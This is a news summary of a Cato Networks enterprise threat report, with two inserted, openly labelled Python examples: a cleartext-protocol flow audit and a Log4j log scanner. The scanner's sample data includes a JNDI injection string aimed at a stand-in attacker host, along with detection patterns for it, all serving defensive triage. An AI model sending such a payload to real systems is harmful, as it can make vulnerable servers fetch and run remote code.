Traitor protocols and insidious AI: The Anatomy of modern attacks on enterprises

Tomcat

The Cato Networks report covers all the dangers and nuances.

Cato Networks has released its first report on the analysis of cyber threats to corporate networks and enterprise IT infrastructure. The document was prepared using the capabilities of the SASE (Secure Access Service Edge) architecture developed by Cato Networks.

SASE combines network and security services into a single cloud platform for secure access. According to Cato, threats are usually analyzed in isolation by separate systems, whereas SASE allows a comprehensive assessment of external data, incoming and outgoing traffic, and network activity, giving a holistic view of the organization's security posture.

The report is based on a huge amount of data collected from more than 2,200 Cato customers worldwide: 1.26 trillion network flows and 21.45 billion repelled attacks. The data was analyzed using Cato's proprietary artificial intelligence and machine learning algorithms, hundreds of cyber threat intelligence sources, and the expertise of a team of specialists that includes former military analysts and scientists.

Applying the generally accepted MITRE ATT&CK framework, the report comprehensively covers all threats from a strategic, tactical, and operational perspective, including malicious and suspicious activity, as well as applications, protocols, and tools used in corporate networks.

Key findings of the report include:

1. Enterprises are actively implementing artificial intelligence tools, such as Microsoft Copilot, ChatGPT from OpenAI, and the Emol app for communicating with emotional AI assistants.

2. The hacker community is actively discussing the use of artificial intelligence technologies to improve malware. For example, AI is expected to improve the efficiency of the SQLMap tool in finding and exploiting vulnerabilities. In addition, hackers offer their colleagues services for generating fake credentials and creating deepfakes. Specialists are also being recruited to develop a malicious version of ChatGPT.

3. Well-known brands, such as Booking, Amazon, and eBay, are actively impersonated by hackers using spoofing methods for fraud and other illegal purposes.

4. Unprotected protocols such as HTTP (62% of web traffic), Telnet (54%), and SMBv1/v2 (46%) are still widely used in corporate networks, which makes it easier for attackers to move laterally once inside.
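One practical way to act on this finding is to measure the share of cleartext protocols in your own flow records before an attacker does. The script below is an added example (not from the Cato report or the forum post): it classifies constructed flow records by destination port, computes the cleartext share per traffic category, and lists the hosts that used a cleartext protocol. The port-to-protocol map is an assumption for illustration; in production, classify by the negotiated protocol, because a port alone cannot distinguish SMBv1 from SMBv2/v3, and SMB 3.x may be encrypted.

```python
"""Audit network flow records for cleartext protocols (HTTP, Telnet, SMB).

Added example, not part of the Cato report or the forum post. The flow
records below are constructed; the port-to-protocol mapping is an
assumption (real flows should be classified by the actual protocol
dialect, since a port alone cannot tell SMBv1 from SMBv2/3).
"""
from collections import defaultdict

# Constructed flow records: (src, dst, dst_port, bytes). Not real data.
FLOWS = [
    ("10.0.1.5",  "10.0.2.10", 80,  120_000),
    ("10.0.1.5",  "10.0.2.10", 443, 80_000),
    ("10.0.1.7",  "10.0.3.4",  23,  4_000),
    ("10.0.1.7",  "10.0.3.4",  22,  6_000),
    ("10.0.1.9",  "10.0.4.20", 445, 50_000),
    ("10.0.1.9",  "10.0.4.20", 139, 10_000),
    ("10.0.1.11", "10.0.5.2",  53,  2_000),
]

# Assumed port map: (protocol name, traffic category, cleartext by default).
# SMB is marked cleartext because encryption is optional and off unless
# explicitly required; treat it as a flag for follow-up, not a verdict.
PORT_MAP = {
    80:  ("HTTP",   "web",    True),
    443: ("HTTPS",  "web",    False),
    23:  ("Telnet", "remote", True),
    22:  ("SSH",    "remote", False),
    445: ("SMB",    "file",   True),
    139: ("SMB",    "file",   True),
    53:  ("DNS",    "dns",    True),
}

UNKNOWN = ("OTHER", "other", False)


def audit_flows(flows, port_map=PORT_MAP):
    """Return per-category byte totals and the share carried by cleartext protocols."""
    totals = defaultdict(int)
    clear = defaultdict(int)
    for _src, _dst, port, nbytes in flows:
        _name, category, is_clear = port_map.get(port, UNKNOWN)
        totals[category] += nbytes
        if is_clear:
            clear[category] += nbytes
    return {
        cat: {
            "total_bytes": totals[cat],
            "cleartext_bytes": clear[cat],
            "cleartext_share": round(clear[cat] / totals[cat], 3) if totals[cat] else 0.0,
        }
        for cat in totals
    }


def cleartext_talkers(flows, port_map=PORT_MAP):
    """Return sorted (source host, protocol) pairs that used a cleartext protocol."""
    pairs = set()
    for src, _dst, port, _nbytes in flows:
        name, _category, is_clear = port_map.get(port, UNKNOWN)
        if is_clear:
            pairs.add((src, name))
    return sorted(pairs)


if __name__ == "__main__":
    for category, stats in audit_flows(FLOWS).items():
        print(f"{category:7s} cleartext share: {stats['cleartext_share']:.0%} "
              f"({stats['cleartext_bytes']} of {stats['total_bytes']} bytes)")
    print("hosts to review:", cleartext_talkers(FLOWS))
```

Run it against an export from your flow collector (NetFlow/IPFIX, firewall logs, or a SASE console) after adapting the record layout; the per-category share is the figure to track over time as Telnet and HTTP get replaced by SSH and HTTPS.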

5. The main threat to enterprises is not 0-day vulnerabilities but old, unpatched ones. In particular, the Log4J vulnerabilities (CVE-2021-44228) remain among the most actively exploited.
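Because Log4J exploitation attempts are still common, it is worth checking whether your web-server logs already carry the telltale JNDI lookup strings. The following is an added example, not code from the Cato report or the forum post: a small triage scanner that flags access-log lines containing a `${jndi:` lookup and separately marks any other `${...}` lookup for review. The log lines are constructed, and the detector is an indicator match to prioritize investigation, not a substitute for patching log4j-core.

```python
"""Flag web-server log lines carrying Log4j JNDI lookup strings (CVE-2021-44228).

Added example, not part of the Cato report or the forum post. The log lines
are constructed; the detector is a simple indicator match for triage and does
not replace patching the affected log4j-core versions.
"""
import re

# Constructed access-log lines (combined log format). The second carries a
# harmless-looking lookup; the third carries a JNDI lookup in the User-Agent.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Jan/2024:10:00:02 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/8.0"
203.0.113.12 - - [10/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"
"""

# A JNDI lookup is the high-confidence indicator; any other lookup is worth a look.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def classify_line(line):
    """Return 'jndi' for a JNDI lookup, 'lookup' for any other ${...} lookup, else 'clean'."""
    if JNDI_RE.search(line):
        return "jndi"
    if LOOKUP_RE.search(line):
        return "lookup"
    return "clean"


def scan_log(text):
    """Return (line number, verdict, source IP) for every line that is not clean."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        verdict = classify_line(line)
        if verdict != "clean":
            source_ip = line.split(" ", 1)[0]  # first field of the combined log format
            hits.append((number, verdict, source_ip))
    return hits


if __name__ == "__main__":
    for number, verdict, source_ip in scan_log(SAMPLE_LOG):
        print(f"line {number}: {verdict:6s} from {source_ip}")
```

A hit on `jndi` from an internet-facing host means the request reached you; whether it did anything depends on the log4j version behind that endpoint, so pair the scan with an inventory of Java services and their log4j-core versions.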

6. The vectors of cyber attacks vary significantly depending on the industry of the enterprise. For example, the entertainment, telecommunications, and mining industries are characterized by DoS (denial of service) attacks, while the service and hotel industries see active exploitation of vulnerabilities to steal credentials.

7. When analyzing threats, context is extremely important, since seemingly harmless activity can actually indicate malicious actions. Their timely detection requires a comprehensive understanding of network traffic patterns combined with the use of artificial intelligence and machine learning technologies.

8. Despite the critical role of DNS for enterprise operations, only 1% of organizations use DNSSEC (DNS Security Extensions). The reasons for its "unpopularity" are still unclear.

To get the most up-to-date and comprehensive information about threats, trends in cybersecurity, the activities of hacker communities, and ways to counter them, Cato recommends reading the full text of the cyberthreat report for SASE.